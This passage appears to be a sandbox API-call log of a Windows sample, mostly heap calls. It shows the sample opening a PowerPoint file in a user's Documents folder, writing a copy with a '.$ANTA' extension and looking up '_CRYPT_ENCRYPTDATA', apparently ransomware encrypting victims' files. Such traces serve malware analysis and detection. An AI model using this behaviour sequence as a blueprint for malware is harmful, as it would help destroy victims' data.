Size=0x10) returned 0x43ca7a8 [0078.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0078.495] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0078.495] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0078.495] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0078.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.496] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\z_hkc3lg6.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.496] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.496] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.496] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.497] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0078.497] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0078.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0078.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0078.498] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\z_hkc3lg6.pptx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.499] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0078.500] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0078.500] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.500] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0078.503] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0078.503] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0xf755, lpOverlapped=0x0) returned 1 [0078.505] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0078.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf755) returned 0x48f0048 [0078.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0078.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0078.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf755) returned 0x48ff7a8 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.512] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf755) returned 0x48f0048 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.512] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0078.512] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0078.512] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0078.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf755) returned 0x48f0048 [0078.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0078.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0078.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf755) returned 0x490ef08 [0078.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.515] RtlAllocateHeap 